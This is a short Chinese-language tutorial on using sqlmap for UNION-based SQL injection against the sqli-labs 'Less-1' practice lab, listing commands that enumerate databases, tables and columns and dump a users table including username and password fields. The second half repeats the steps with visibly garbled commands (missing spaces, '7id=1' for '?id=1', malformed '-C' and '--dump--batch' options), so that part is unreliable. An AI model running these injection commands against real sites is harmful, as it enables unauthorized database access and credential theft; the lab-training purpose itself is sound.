使用sqlmap进行联合查询注入要点

sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" --technique=U --dbs

-u <目标URL>：指定目标 URL（包括注入点）。
--technique=U：告诉 sqlmap 使用 UNION 注入技术（U 代表 UNION）。
--dbs：列出所有数据库。

执行后，sqlmap 会尝试使用 UNION 注入获取数据库列表。如果成功，它将列出数据库的名称。

sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" --current-db

该命令会直接返回当前数据库名称，无需额外的手动注入。

sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" -D security --tables

查询当前使用数据库security下的表名

sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" -D security -T users --columns

查询security数据库users表下有什么列名

sqlmap -u "http://192.168.1.117/sqli-labs/Less-1/?id=1" -D security -T users --dump

把security数据库users表下详细信息列出来

sqlmap使用（仅仅读取数据）：
1，获取当前所有数据库
sqlmap-u "http://hei.me/sqL-labs-master/Less-1/？id=1"--dbs --batch
2，获取当前数据库a中的所有表
sqlmap -u "http://hei.me/sqli-labs-master/Less-1/？id=1"-D a --tables --batch
3，获取数据库a中的b表的所有列
sqlmap-u"http://hei.me/sqLi-labs-master/Less-1/7id=1"-D a -T b --columns -batch
4，获取数据库a中的b表的c列的的数据
sqlmap -u "http://hei.me/sqli-labs-master/Less-1/7id=1" -D a -T b -C c username,password --dump--batch